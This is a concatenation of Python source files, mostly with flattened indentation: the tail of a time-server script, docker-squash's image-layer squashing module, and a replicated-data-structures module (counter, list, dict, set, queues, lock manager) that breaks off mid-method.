parser.add_argument("--port", help="time server port", type=int, default=8037)
args = parser.parse_args()
run_server('', args.port)
|
image.py
|
import datetime
import docker
import hashlib
import json
import logging
import os
import re
import shutil
import six
import tarfile
import tempfile
import threading
from docker_squash.errors import SquashError, SquashUnnecessaryError
if not six.PY3:
import docker_squash.lib.xtarfile
class Chdir(object):
""" Context manager for changing the current working directory """
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
class Image(object):
"""
Base class for all Docker image formats. Contains many functions that are handy
while squashing the image.
This class should not be used directly.
"""
FORMAT = None
""" Image format version """
def __init__(self, log, docker, image, from_layer, tmp_dir=None, tag=None, comment=""):
self.log = log
self.debug = self.log.isEnabledFor(logging.DEBUG)
self.docker = docker
self.image = image
self.from_layer = from_layer
self.tag = tag
self.comment = comment
self.image_name = None
self.image_tag = None
self.squash_id = None
# Workaround for https://play.golang.org/p/sCsWMXYxqy
#
# Golang doesn't add padding to microseconds when marshaling
# microseconds in date into JSON. Python does.
# We need to produce same output as Docker's to not generate
# different metadata. That's why we need to strip all zeros at the
# end of the date string...
self.date = re.sub(
r'0*Z$', 'Z', datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%fZ'))
""" Date used in metadata, already formatted using the `%Y-%m-%dT%H:%M:%S.%fZ` format """
self.tmp_dir = tmp_dir
""" Main temporary directory to save all working files. This is the root directory for all other temporary files. """
def squash(self):
self._before_squashing()
ret = self._squash()
self._after_squashing()
return ret
def _squash(self):
pass
def cleanup(self):
""" Cleanup the temporary directory """
self.log.debug("Cleaning up %s temporary directory" % self.tmp_dir)
shutil.rmtree(self.tmp_dir, ignore_errors=True)
def _initialize_directories(self):
# Prepare temporary directory where all the work will be executed
try:
self.tmp_dir = self._prepare_tmp_directory(self.tmp_dir)
        except Exception:
raise SquashError("Preparing temporary directory failed")
# Temporary location on the disk of the old, unpacked *image*
self.old_image_dir = os.path.join(self.tmp_dir, "old")
# Temporary location on the disk of the new, unpacked, squashed *image*
self.new_image_dir = os.path.join(self.tmp_dir, "new")
# Temporary location on the disk of the squashed *layer*
self.squashed_dir = os.path.join(self.new_image_dir, "squashed")
for d in self.old_image_dir, self.new_image_dir:
os.makedirs(d)
def _squash_id(self, layer):
if layer == "<missing>":
self.log.warning(
"You try to squash from layer that does not have it's own ID, we'll try to find it later")
return None
try:
squash_id = self.docker.inspect_image(layer)['Id']
        except Exception:
raise SquashError(
"Could not get the layer ID to squash, please check provided 'layer' argument: %s" % layer)
if squash_id not in self.old_image_layers:
raise SquashError(
"Couldn't find the provided layer (%s) in the %s image" % (layer, self.image))
self.log.debug("Layer ID to squash from: %s" % squash_id)
return squash_id
def _validate_number_of_layers(self, number_of_layers):
"""
Makes sure that the specified number of layers to squash
is a valid number
"""
# Only positive numbers are correct
if number_of_layers <= 0:
raise SquashError(
"Number of layers to squash cannot be less or equal 0, provided: %s" % number_of_layers)
# Do not squash if provided number of layer to squash is bigger
# than number of actual layers in the image
if number_of_layers > len(self.old_image_layers):
raise SquashError(
"Cannot squash %s layers, the %s image contains only %s layers" % (number_of_layers, self.image, len(self.old_image_layers)))
def _before_squashing(self):
self._initialize_directories()
# Location of the tar archive with squashed layers
self.squashed_tar = os.path.join(self.squashed_dir, "layer.tar")
if self.tag:
self.image_name, self.image_tag = self._parse_image_name(self.tag)
# The image id or name of the image to be squashed
try:
self.old_image_id = self.docker.inspect_image(self.image)['Id']
except SquashError:
raise SquashError(
"Could not get the image ID to squash, please check provided 'image' argument: %s" % self.image)
self.old_image_layers = []
# Read all layers in the image
self._read_layers(self.old_image_layers, self.old_image_id)
self.old_image_layers.reverse()
self.log.info("Old image has %s layers", len(self.old_image_layers))
self.log.debug("Old layers: %s", self.old_image_layers)
# By default - squash all layers.
        if self.from_layer is None:
self.from_layer = len(self.old_image_layers)
try:
number_of_layers = int(self.from_layer)
self.log.debug(
"We detected number of layers as the argument to squash")
except ValueError:
self.log.debug("We detected layer as the argument to squash")
squash_id = self._squash_id(self.from_layer)
if not squash_id:
raise SquashError(
"The %s layer could not be found in the %s image" % (self.from_layer, self.image))
number_of_layers = len(self.old_image_layers) - \
self.old_image_layers.index(squash_id) - 1
self._validate_number_of_layers(number_of_layers)
marker = len(self.old_image_layers) - number_of_layers
self.layers_to_squash = self.old_image_layers[marker:]
self.layers_to_move = self.old_image_layers[:marker]
self.log.info("Checking if squashing is necessary...")
if len(self.layers_to_squash) < 1:
raise SquashError(
"Invalid number of layers to squash: %s" % len(self.layers_to_squash))
if len(self.layers_to_squash) == 1:
raise SquashUnnecessaryError(
"Single layer marked to squash, no squashing is required")
self.log.info("Attempting to squash last %s layers...",
number_of_layers)
self.log.debug("Layers to squash: %s", self.layers_to_squash)
self.log.debug("Layers to move: %s", self.layers_to_move)
# Fetch the image and unpack it on the fly to the old image directory
self._save_image(self.old_image_id, self.old_image_dir)
self.size_before = self._dir_size(self.old_image_dir)
self.log.info("Squashing image '%s'..." % self.image)
def _after_squashing(self):
self.log.debug("Removing from disk already squashed layers...")
shutil.rmtree(self.old_image_dir, ignore_errors=True)
self.size_after = self._dir_size(self.new_image_dir)
size_before_mb = float(self.size_before)/1024/1024
size_after_mb = float(self.size_after)/1024/1024
self.log.info("Original image size: %.2f MB" % size_before_mb)
self.log.info("Squashed image size: %.2f MB" % size_after_mb)
        if size_after_mb >= size_before_mb:
            self.log.info("If the squashed image is larger than the original, it means there were no meaningful files to squash and only metadata was added. Are you sure you specified the correct parameters?")
else:
self.log.info("Image size decreased by %.2f %%" % float(
((size_before_mb-size_after_mb)/size_before_mb)*100))
def _dir_size(self, directory):
size = 0
for path, dirs, files in os.walk(directory):
for f in files:
size += os.path.getsize(os.path.join(path, f))
return size
def layer_paths(self):
"""
        Returns the names of the layer directories in the exported tar archive.
"""
pass
def export_tar_archive(self, target_tar_file):
self._tar_image(target_tar_file, self.new_image_dir)
self.log.info("Image available at '%s'" % target_tar_file)
def load_squashed_image(self):
self._load_image(self.new_image_dir)
if self.tag:
self.log.info("Image registered in Docker daemon as %s:%s" %
(self.image_name, self.image_tag))
def _files_in_layers(self, layers, directory):
"""
Prepare a list of files in all layers
"""
files = {}
for layer in layers:
self.log.debug("Generating list of files in layer '%s'..." % layer)
tar_file = os.path.join(directory, layer, "layer.tar")
with tarfile.open(tar_file, 'r', format=tarfile.PAX_FORMAT) as tar:
files[layer] = [self._normalize_path(
x) for x in tar.getnames()]
self.log.debug("Done, found %s files" % len(files[layer]))
return files
def _prepare_tmp_directory(self, tmp_dir):
""" Creates temporary directory that is used to work on layers """
if tmp_dir:
if os.path.exists(tmp_dir):
raise SquashError(
"The '%s' directory already exists, please remove it before you proceed" % tmp_dir)
os.makedirs(tmp_dir)
else:
tmp_dir = tempfile.mkdtemp(prefix="docker-squash-")
self.log.debug("Using %s as the temporary directory" % tmp_dir)
return tmp_dir
def _load_image(self, directory):
tar_file = os.path.join(self.tmp_dir, "image.tar")
self._tar_image(tar_file, directory)
with open(tar_file, 'rb') as f:
self.log.debug("Loading squashed image...")
self.docker.load_image(f)
self.log.debug("Image loaded!")
os.remove(tar_file)
def _tar_image(self, target_tar_file, directory):
with tarfile.open(target_tar_file, 'w', format=tarfile.PAX_FORMAT) as tar:
self.log.debug("Generating tar archive for the squashed image...")
with Chdir(directory):
# docker produces images like this:
# repositories
# <layer>/json
# and not:
# ./
# ./repositories
# ./<layer>/json
for f in os.listdir("."):
tar.add(f)
self.log.debug("Archive generated")
def _layers_to_squash(self, layers, from_layer):
""" Prepares a list of layer IDs that should be squashed """
to_squash = []
to_leave = []
should_squash = True
for l in reversed(layers):
if l == from_layer:
should_squash = False
if should_squash:
to_squash.append(l)
else:
to_leave.append(l)
to_squash.reverse()
to_leave.reverse()
return to_squash, to_leave
def _extract_tar(self, fileobj, directory):
with tarfile.open(fileobj=fileobj, mode='r|') as tar:
tar.extractall(path=directory)
def _save_image(self, image_id, directory):
""" Saves the image as a tar archive under specified name """
for x in [0, 1, 2]:
self.log.info("Saving image %s to %s directory..." %
(image_id, directory))
self.log.debug("Try #%s..." % (x + 1))
try:
image = self.docker.get_image(image_id)
if docker.version_info[0] < 3:
# Docker library prior to 3.0.0 returned the requests
                    # object directly, which could be used to read from
self.log.debug(
"Extracting image using HTTPResponse object directly")
self._extract_tar(image, directory)
else:
# Docker library >=3.0.0 returns iterator over raw data
self.log.debug(
"Extracting image using iterator over raw data")
fd_r, fd_w = os.pipe()
r = os.fdopen(fd_r, 'rb')
w = os.fdopen(fd_w, 'wb')
extracter = threading.Thread(
target=self._extract_tar, args=(r, directory))
extracter.start()
for chunk in image:
w.write(chunk)
w.flush()
w.close()
extracter.join()
r.close()
self.log.info("Image saved!")
return True
except Exception as e:
self.log.exception(e)
self.log.warning(
"An error occured while saving the %s image, retrying..." % image_id)
raise SquashError("Couldn't save %s image!" % image_id)
def _unpack(self, tar_file, directory):
""" Unpacks tar archive to selected directory """
self.log.info("Unpacking %s tar file to %s directory" %
(tar_file, directory))
with tarfile.open(tar_file, 'r') as tar:
tar.extractall(path=directory)
self.log.info("Archive unpacked!")
def _read_layers(self, layers, image_id):
""" Reads the JSON metadata for specified layer / image id """
for layer in self.docker.history(image_id):
layers.append(layer['Id'])
def _parse_image_name(self, image):
"""
Parses the provided image name and splits it in the
name and tag part, if possible. If no tag is provided
'latest' is used.
"""
if ':' in image and '/' not in image.split(':')[-1]:
image_tag = image.split(':')[-1]
image_name = image[:-(len(image_tag) + 1)]
else:
image_tag = "latest"
image_name = image
return (image_name, image_tag)
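    # Illustrative results (hypothetical image names, not from the original
    # source):
    #   _parse_image_name("example/app:1.0") -> ("example/app", "1.0")
    #   _parse_image_name("example/app")     -> ("example/app", "latest")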
def _dump_json(self, data, new_line=False):
"""
Helper function to marshal object into JSON string.
Additionally a sha256sum of the created JSON string is generated.
"""
# We do not want any spaces between keys and values in JSON
json_data = json.dumps(data, separators=(',', ':'))
if new_line:
json_data = "%s\n" % json_data
# Generate sha256sum of the JSON data, may be handy
sha = hashlib.sha256(json_data.encode('utf-8')).hexdigest()
return json_data, sha
def _generate_repositories_json(self, repositories_file, image_id, name, tag):
if not image_id:
raise SquashError("Provided image id cannot be null")
        if name is None and tag is None:
self.log.debug(
"No name and tag provided for the image, skipping generating repositories file")
return
repos = {}
repos[name] = {}
repos[name][tag] = image_id
data = json.dumps(repos, separators=(',', ':'))
with open(repositories_file, 'w') as f:
f.write(data)
f.write("\n")
def _write_version_file(self, squashed_dir):
version_file = os.path.join(squashed_dir, "VERSION")
with open(version_file, 'w') as f:
f.write("1.0")
def _write_json_metadata(self, metadata, metadata_file):
with open(metadata_file, 'w') as f:
f.write(metadata)
def _read_old_metadata(self, old_json_file):
self.log.debug("Reading JSON metadata file '%s'..." % old_json_file)
# Read original metadata
with open(old_json_file, 'r') as f:
metadata = json.load(f)
return metadata
def _move_layers(self, layers, src, dest):
"""
This moves all the layers that should be copied as-is.
In other words - all layers that are not meant to be squashed will be
moved from the old image to the new image untouched.
"""
for layer in layers:
layer_id = layer.replace('sha256:', '')
self.log.debug("Moving unmodified layer '%s'..." % layer_id)
shutil.move(os.path.join(src, layer_id), dest)
def _file_should_be_skipped(self, file_name, file_paths):
# file_paths is now array of array with files to be skipped.
# First level are layers, second are files in these layers.
layer_nb = 1
for layers in file_paths:
for file_path in layers:
if file_name == file_path or file_name.startswith(file_path + "/"):
return layer_nb
layer_nb += 1
return 0
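    # For example (hypothetical paths), with to_skip = [['/opt/app'], ['/etc/passwd']]
    # (one inner list per layer), '/opt/app/bin/run' returns 1 because it lives
    # under a path skipped in the first layer, while '/var/log/messages' returns 0.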
def _marker_files(self, tar, members):
"""
Searches for marker files in the specified archive.
        Docker marker files are files that have the .wh. prefix in the name.
These files mark the corresponding file to be removed (hidden) when
we start a container from the image.
"""
marker_files = {}
self.log.debug(
"Searching for marker files in '%s' archive..." % tar.name)
for member in members:
if '.wh.' in member.name:
self.log.debug("Found '%s' marker file" % member.name)
marker_files[member] = tar.extractfile(member)
self.log.debug("Done, found %s files" % len(marker_files))
return marker_files
def _add_markers(self, markers, tar, files_in_layers, added_symlinks):
"""
This method is responsible for adding back all markers that were not
added to the squashed layer AND files they refer to can be found in layers
we do not squash.
"""
if markers:
self.log.debug("Marker files to add: %s" %
[o.name for o in markers.keys()])
else:
# No marker files to add
return
# https://github.com/goldmann/docker-squash/issues/108
# Some tar archives do have the filenames prefixed with './'
        # which does not have any effect when we unpack the tar archive,
# but when processing tar content - we see this.
tar_files = [self._normalize_path(x) for x in tar.getnames()]
for marker, marker_file in six.iteritems(markers):
actual_file = marker.name.replace('.wh.', '')
normalized_file = self._normalize_path(actual_file)
should_be_added_back = False
if self._file_should_be_skipped(normalized_file, added_symlinks):
self.log.debug(
"Skipping '%s' marker file, this file is on a symlink path" % normalized_file)
continue
if normalized_file in tar_files:
self.log.debug(
"Skipping '%s' marker file, this file was added earlier for some reason..." % normalized_file)
continue
if files_in_layers:
for files in files_in_layers.values():
if normalized_file in files:
should_be_added_back = True
break
else:
# There are no previous layers, so we need to add it back
# In fact this shouldn't happen since having a marker file
# where there is no previous layer does not make sense.
should_be_added_back = True
if should_be_added_back:
self.log.debug(
"Adding '%s' marker file back..." % marker.name)
# Marker files on AUFS are hardlinks, we need to create
# regular files, therefore we need to recreate the tarinfo
# object
tar.addfile(tarfile.TarInfo(name=marker.name), marker_file)
# Add the file name to the list too to avoid re-reading all files
# in tar archive
tar_files.append(normalized_file)
else:
self.log.debug(
"Skipping '%s' marker file..." % marker.name)
def _normalize_path(self, path):
return os.path.normpath(os.path.join("/", path))
def _add_hardlinks(self, squashed_tar, squashed_files, to_skip, skipped_hard_links):
for layer, hardlinks_in_layer in enumerate(skipped_hard_links):
# We need to start from 1, that's why we bump it here
current_layer = layer + 1
for member in six.itervalues(hardlinks_in_layer):
normalized_name = self._normalize_path(member.name)
normalized_linkname = self._normalize_path(member.linkname)
# Find out if the name is on the list of files to skip - if it is - get the layer number
# where it was found
layer_skip_name = self._file_should_be_skipped(
normalized_name, to_skip)
# Do the same for linkname
layer_skip_linkname = self._file_should_be_skipped(
normalized_linkname, to_skip)
# We need to check if we should skip adding back the hard link
# This can happen in the following situations:
# 1. hard link is on the list of files to skip
# 2. hard link target is on the list of files to skip
# 3. hard link is already in squashed files
# 4. hard link target is NOT in already squashed files
if layer_skip_name and current_layer > layer_skip_name or layer_skip_linkname and current_layer > layer_skip_linkname or normalized_name in squashed_files or normalized_linkname not in squashed_files:
self.log.debug("Found a hard link '%s' to a file which is marked to be skipped: '%s', skipping link too" % (
normalized_name, normalized_linkname))
else:
if self.debug:
self.log.debug("Adding hard link '%s' pointing to '%s' back..." % (
normalized_name, normalized_linkname))
squashed_files.append(normalized_name)
squashed_tar.addfile(member)
def _add_file(self, member, content, squashed_tar, squashed_files, to_skip):
normalized_name = self._normalize_path(member.name)
if normalized_name in squashed_files:
self.log.debug(
"Skipping file '%s' because it is already squashed" % normalized_name)
return
if self._file_should_be_skipped(normalized_name, to_skip):
self.log.debug(
"Skipping '%s' file because it's on the list to skip files" % normalized_name)
return
if content:
squashed_tar.addfile(member, content)
else:
            # Special case: non-regular members (e.g. directories) have no
            # file content, so we add only the tar header itself
squashed_tar.addfile(member)
# We added a file to the squashed tar, so let's note it
squashed_files.append(normalized_name)
def _add_symlinks(self, squashed_tar, squashed_files, to_skip, skipped_sym_links):
added_symlinks = []
for layer, symlinks_in_layer in enumerate(skipped_sym_links):
# We need to start from 1, that's why we bump it here
current_layer = layer + 1
for member in six.itervalues(symlinks_in_layer):
# Handling symlinks. This is similar to hard links with one
# difference. Sometimes we do want to have broken symlinks
                # be added either way because these can point to locations
                # that will become available after adding volumes, for example.
normalized_name = self._normalize_path(member.name)
normalized_linkname = self._normalize_path(member.linkname)
# File is already in squashed files, skipping
if normalized_name in squashed_files:
self.log.debug(
"Found a symbolic link '%s' which is already squashed, skipping" % (normalized_name))
continue
if self._file_should_be_skipped(normalized_name, added_symlinks):
self.log.debug(
"Found a symbolic link '%s' which is on a path to previously squashed symlink, skipping" % (normalized_name))
continue
# Find out if the name is on the list of files to skip - if it is - get the layer number
# where it was found
layer_skip_name = self._file_should_be_skipped(
normalized_name, to_skip)
# Do the same for linkname
layer_skip_linkname = self._file_should_be_skipped(
normalized_linkname, to_skip)
# If name or linkname was found in the lists of files to be
# skipped or it's not found in the squashed files
if layer_skip_name and current_layer > layer_skip_name or layer_skip_linkname and current_layer > layer_skip_linkname:
self.log.debug("Found a symbolic link '%s' to a file which is marked to be skipped: '%s', skipping link too" % (
normalized_name, normalized_linkname))
else:
if self.debug:
self.log.debug("Adding symbolic link '%s' pointing to '%s' back..." % (
normalized_name, normalized_linkname))
added_symlinks.append([normalized_name])
squashed_files.append(normalized_name)
squashed_tar.addfile(member)
return added_symlinks
def _squash_layers(self, layers_to_squash, layers_to_move):
self.log.info("Starting squashing...")
# Reverse the layers to squash - we begin with the newest one
# to make the tar lighter
layers_to_squash.reverse()
# Find all files in layers that we don't squash
files_in_layers_to_move = self._files_in_layers(
layers_to_move, self.old_image_dir)
with tarfile.open(self.squashed_tar, 'w', format=tarfile.PAX_FORMAT) as squashed_tar:
to_skip = []
skipped_markers = {}
skipped_hard_links = []
skipped_sym_links = []
skipped_files = []
# List of filenames in the squashed archive
squashed_files = []
# List of opaque directories in the image
opaque_dirs = []
for layer_id in layers_to_squash:
layer_tar_file = os.path.join(
self.old_image_dir, layer_id, "layer.tar")
self.log.info("Squashing file '%s'..." % layer_tar_file)
                # Open the existing layer to squash
with tarfile.open(layer_tar_file, 'r', format=tarfile.PAX_FORMAT) as layer_tar:
# Find all marker files for all layers
# We need the list of marker files upfront, so we can
# skip unnecessary files
members = layer_tar.getmembers()
markers = self._marker_files(layer_tar, members)
skipped_sym_link_files = {}
skipped_hard_link_files = {}
skipped_files_in_layer = {}
files_to_skip = []
# List of opaque directories found in this layer
layer_opaque_dirs = []
# Add it as early as possible, we will be populating
# 'skipped_sym_link_files' array later
skipped_sym_links.append(skipped_sym_link_files)
# Add it as early as possible, we will be populating
# 'files_to_skip' array later
to_skip.append(files_to_skip)
# Iterate over marker files found for this particular
# layer and if a file in the squashed layers file corresponding
# to the marker file is found, then skip both files
for marker, marker_file in six.iteritems(markers):
# We have a opaque directory marker file
# https://github.com/opencontainers/image-spec/blob/master/layer.md#opaque-whiteout
if marker.name.endswith('.wh..wh..opq'):
opaque_dir = os.path.dirname(marker.name)
self.log.debug(
"Found opaque directory: '%s'" % opaque_dir)
layer_opaque_dirs.append(opaque_dir)
else:
files_to_skip.append(
self._normalize_path(marker.name.replace('.wh.', '')))
skipped_markers[marker] = marker_file
# Copy all the files to the new tar
for member in members:
normalized_name = self._normalize_path(member.name)
if self._is_in_opaque_dir(member, opaque_dirs):
self.log.debug(
"Skipping file '%s' because it is in an opaque directory" % normalized_name)
continue
# Skip all symlinks, we'll investigate them later
if member.issym():
skipped_sym_link_files[normalized_name] = member
continue
if member in six.iterkeys(skipped_markers):
self.log.debug(
"Skipping '%s' marker file, at the end of squashing we'll see if it's necessary to add it back" % normalized_name)
continue
if self._file_should_be_skipped(normalized_name, skipped_sym_links):
self.log.debug(
"Skipping '%s' file because it's on a symlink path, at the end of squashing we'll see if it's necessary to add it back" % normalized_name)
if member.isfile():
f = (member, layer_tar.extractfile(member))
else:
f = (member, None)
skipped_files_in_layer[normalized_name] = f
continue
# Skip files that are marked to be skipped
if self._file_should_be_skipped(normalized_name, to_skip):
self.log.debug(
"Skipping '%s' file because it's on the list to skip files" % normalized_name)
continue
# Check if file is already added to the archive
if normalized_name in squashed_files:
                            # File already exists in the squashed archive; skip it because
                            # the file we want to add is older than the one already in the archive.
# This is true because we do reverse squashing - from
# newer to older layer
self.log.debug(
"Skipping '%s' file because it's older than file already added to the archive" % normalized_name)
continue
# Hard links are processed after everything else
if member.islnk():
skipped_hard_link_files[normalized_name] = member
continue
content = None
if member.isfile():
content = layer_tar.extractfile(member)
self._add_file(member, content,
squashed_tar, squashed_files, to_skip)
skipped_hard_links.append(skipped_hard_link_files)
skipped_files.append(skipped_files_in_layer)
opaque_dirs += layer_opaque_dirs
self._add_hardlinks(squashed_tar, squashed_files,
to_skip, skipped_hard_links)
added_symlinks = self._add_symlinks(
squashed_tar, squashed_files, to_skip, skipped_sym_links)
for layer in skipped_files:
for member, content in six.itervalues(layer):
self._add_file(member, content, squashed_tar,
squashed_files, added_symlinks)
if files_in_layers_to_move:
self._reduce(skipped_markers)
self._add_markers(skipped_markers, squashed_tar,
files_in_layers_to_move, added_symlinks)
self.log.info("Squashing finished!")
def _is_in_opaque_dir(self, member, dirs):
"""
If the member we investigate is an opaque directory
or if the member is located inside of the opaque directory,
we copy these files as-is. Any other layer that has content
on the opaque directory will be ignored!
"""
for opaque_dir in dirs:
if member.name == opaque_dir or member.name.startswith("%s/" % opaque_dir):
self.log.debug("Member '%s' found to be part of opaque directory '%s'" % (
member.name, opaque_dir))
return True
return False
def _reduce(self, markers):
"""
This function is responsible for reducing marker files
that are scheduled to be added at the end of squashing to
minimum.
In some cases, one marker file will overlap
with others making others not necessary.
This is not only about adding less marker files, but
if we try to add a marker file for a file or directory
deeper in the hierarchy of already marked directory,
the image will not be successfully loaded back into Docker
daemon.
Passed dictionary containing markers is altered *in-place*.
Args:
markers (dict): Dictionary of markers scheduled to be added.
"""
self.log.debug("Reducing marker files to be added back...")
# Prepare a list of files (or directories) based on the marker
# files scheduled to be added
marked_files = list(map(lambda x: self._normalize_path(
x.name.replace('.wh.', '')), markers.keys()))
# List of markers that should be not added back to tar file
to_remove = []
for marker in markers.keys():
self.log.debug(
"Investigating '{}' marker file".format(marker.name))
path = self._normalize_path(marker.name.replace('.wh.', ''))
# Iterate over the path hierarchy, but starting with the
# root directory. This will make it possible to remove
# marker files based on the highest possible directory level
for directory in reversed(self._path_hierarchy(path)):
if directory in marked_files:
self.log.debug(
"Marker file '{}' is superseded by higher-level marker file: '{}'".format(marker.name, directory))
to_remove.append(marker)
break
self.log.debug("Removing {} marker files".format(len(to_remove)))
if to_remove:
for marker in to_remove:
self.log.debug("Removing '{}' marker file".format(marker.name))
markers.pop(marker)
self.log.debug("Marker files reduced")
def _path_hierarchy(self, path):
"""
Creates a full hierarchy of directories for a given path.
For a particular path, a list will be returned
containing paths from the path specified, through all levels
up to the root directory.
Example:
Path '/opt/testing/some/dir/structure/file'
will return:
['/opt/testing/some/dir/structure', '/opt/testing/some/dir', '/opt/testing/some', '/opt/testing', '/opt', '/']
"""
if not path:
raise SquashError("No path provided to create the hierarchy for")
hierarchy = []
dirname = os.path.dirname(path)
hierarchy.append(dirname)
# If we are already at root level, stop
if dirname != '/':
hierarchy.extend(self._path_hierarchy(dirname))
return hierarchy
|
batteries.py
|
import threading
import weakref
import time
import socket
import os
import collections
import heapq
from .syncobj import SyncObjConsumer, replicated
class ReplCounter(SyncObjConsumer):
def __init__(self):
"""
Simple distributed counter. You can set, add, sub and inc counter value.
"""
super(ReplCounter, self).__init__()
self.__counter = int()
@replicated
def set(self, newValue):
"""
Set new value to a counter.
:param newValue: new value
:return: new counter value
"""
self.__counter = newValue
return self.__counter
@replicated
def add(self, value):
"""
Adds value to a counter.
:param value: value to add
:return: new counter value
"""
self.__counter += value
return self.__counter
@replicated
def sub(self, value):
"""
Subtracts a value from counter.
:param value: value to subtract
:return: new counter value
"""
self.__counter -= value
return self.__counter
@replicated
def inc(self):
"""
Increments counter value by one.
:return: new counter value
"""
self.__counter += 1
return self.__counter
def get(self):
"""
:return: current counter value
"""
return self.__counter
class ReplList(SyncObjConsumer):
def __init__(self):
"""
Distributed list - it has an interface similar to a regular list.
"""
super(ReplList, self).__init__()
self.__data = []
@replicated
def reset(self, newData):
"""Replace list with a new one"""
assert isinstance(newData, list)
self.__data = newData
@replicated
def set(self, position, newValue):
"""Update value at given position."""
self.__data[position] = newValue
@replicated
def append(self, item):
"""Append item to end"""
self.__data.append(item)
@replicated
def extend(self, other):
"""Extend list by appending elements from the iterable"""
self.__data.extend(other)
@replicated
def insert(self, position, element):
"""Insert object before position"""
self.__data.insert(position, element)
@replicated
def remove(self, element):
"""
Remove first occurrence of element.
Raises ValueError if the value is not present.
"""
self.__data.remove(element)
@replicated
def pop(self, position=None):
"""
Remove and return item at position (default last).
Raises IndexError if list is empty or index is out of range.
"""
        if position is None:
            return self.__data.pop()
        return self.__data.pop(position)
@replicated
def sort(self, reverse=False):
"""Stable sort *IN PLACE*"""
self.__data.sort(reverse=reverse)
def index(self, element):
"""
Return first position of element.
Raises ValueError if the value is not present.
"""
return self.__data.index(element)
def count(self, element):
""" Return number of occurrences of element """
return self.__data.count(element)
def get(self, position):
""" Return value at given position"""
return self.__data[position]
def __getitem__(self, position):
""" Return value at given position"""
return self.__data[position]
@replicated(ver=1)
def __setitem__(self, position, element):
"""Update value at given position."""
self.__data[position] = element
def __len__(self):
"""Return the number of items of a sequence or collection."""
return len(self.__data)
def rawData(self):
"""Return internal list - use it carefully"""
return self.__data
class ReplDict(SyncObjConsumer):
def __init__(self):
"""
Distributed dict - it has an interface similar to a regular dict.
"""
super(ReplDict, self).__init__()
self.__data = {}
@replicated
def reset(self, newData):
"""Replace dict with a new one"""
assert isinstance(newData, dict)
self.__data = newData
@replicated
def __setitem__(self, key, value):
"""Set value for specified key"""
self.__data[key] = value
@replicated
def set(self, key, value):
"""Set value for specified key"""
self.__data[key] = value
@replicated
def setdefault(self, key, default):
"""Return value for specified key, set default value if key not exist"""
return self.__data.setdefault(key, default)
@replicated
def update(self, other):
"""Adds all values from the other dict"""
self.__data.update(other)
@replicated
def pop(self, key, default=None):
"""Remove and return value for given key, return default if key not exist"""
return self.__data.pop(key, default)
@replicated
def clear(self):
"""Remove all items from dict"""
self.__data.clear()
def __getitem__(self, key):
"""Return value for given key"""
return self.__data[key]
def get(self, key, default=None):
"""Return value for given key, return default if key not exist"""
return self.__data.get(key, default)
def __len__(self):
"""Return size of dict"""
return len(self.__data)
def __contains__(self, key):
"""True if key exists"""
return key in self.__data
def keys(self):
"""Return all keys"""
return self.__data.keys()
def values(self):
"""Return all values"""
return self.__data.values()
def items(self):
"""Return all items"""
return self.__data.items()
def rawData(self):
"""Return internal dict - use it carefully"""
return self.__data
class ReplSet(SyncObjConsumer):
def __init__(self):
"""
Distributed set - it has an interface similar to a regular set.
"""
super(ReplSet, self).__init__()
self.__data = set()
@replicated
def reset(self, newData):
"""Replace set with a new one"""
assert isinstance(newData, set)
self.__data = newData
@replicated
def add(self, item):
"""Add an element to a set"""
self.__data.add(item)
@replicated
def remove(self, item):
"""
Remove an element from a set; it must be a member.
If the element is not a member, raise a KeyError.
"""
self.__data.remove(item)
@replicated
def discard(self, item):
"""
Remove an element from a set if it is a member.
If the element is not a member, do nothing.
"""
self.__data.discard(item)
@replicated
def pop(self):
"""
Remove and return an arbitrary set element.
Raises KeyError if the set is empty.
"""
return self.__data.pop()
@replicated
def clear(self):
""" Remove all elements from this set. """
self.__data.clear()
@replicated
def update(self, other):
""" Update a set with the union of itself and others. """
self.__data.update(other)
def rawData(self):
"""Return internal dict - use it carefully"""
return self.__data
def __len__(self):
"""Return size of set"""
return len(self.__data)
def __contains__(self, item):
"""True if item exists"""
return item in self.__data
class ReplQueue(SyncObjConsumer):
def __init__(self, maxsize=0):
"""
Replicated FIFO queue. Based on collections.deque.
Has an interface similar to Queue.
:param maxsize: Max queue size.
:type maxsize: int
"""
super(ReplQueue, self).__init__()
self.__maxsize = maxsize
self.__data = collections.deque()
def qsize(self):
"""Return size of queue"""
return len(self.__data)
def empty(self):
"""True if queue is empty"""
return len(self.__data) == 0
def __len__(self):
"""Return size of queue"""
return len(self.__data)
def full(self):
"""True if queue is full"""
return len(self.__data) == self.__maxsize
@replicated
def put(self, item):
"""Put an item into the queue.
True - if item placed in queue.
False - if queue is full and item can not be placed."""
if self.__maxsize and len(self.__data) >= self.__maxsize:
return False
self.__data.append(item)
return True
@replicated
def get(self, default=None):
"""Extract item from queue.
Return default if queue is empty."""
try:
return self.__data.popleft()
        except IndexError:
return default
class ReplPriorityQueue(SyncObjConsumer):
def __init__(self, maxsize=0):
"""
Replicated priority queue. Based on heapq.
Has an interface similar to Queue.
:param maxsize: Max queue size.
:type maxsize: int
"""
super(ReplPriorityQueue, self).__init__()
self.__maxsize = maxsize
self.__data = []
def qsize(self):
"""Return size of queue"""
return len(self.__data)
def empty(self):
"""True if queue is empty"""
return len(self.__data) == 0
def __len__(self):
"""Return size of queue"""
return len(self.__data)
def full(self):
"""True if queue is full"""
return len(self.__data) == self.__maxsize
@replicated
def put(self, item):
"""Put an item into the queue. Items should be comparable, eg. tuples.
True - if item placed in queue.
False - if queue is full and item can not be placed."""
if self.__maxsize and len(self.__data) >= self.__maxsize:
return False
heapq.heappush(self.__data, item)
return True
@replicated
def get(self, default=None):
"""Extract the smallest item from queue.
Return default if queue is empty."""
if not self.__data:
return default
return heapq.heappop(self.__data)
class _ReplLockManagerImpl(SyncObjConsumer):
def __init__(self, autoUnlockTime):
super(_ReplLockManagerImpl, self).__init__()
self.__locks = {}
self.__autoUnlockTime = autoUnlockTime
@replicated
def acquire(self, lockID, clientID, currentTime):
existingLock = self.__locks.get(lockID, None)
# Auto-unlock old lock
if existingLock is not None:
if currentTime - existingLock[1] > self.__autoUnlockTime:
existingLock = None
# Acquire lock if possible
if existingLock is None or existingLock[0] == clientID:
self.__locks[lockID] = (clientID, currentTime)
return True
# Lock already acquired by someone else
return False
@replicated
def prolongate(self, clientID, currentTime):
for lockID in list(self.__locks):
lockClientID, lockTime = self.__locks[lockID]
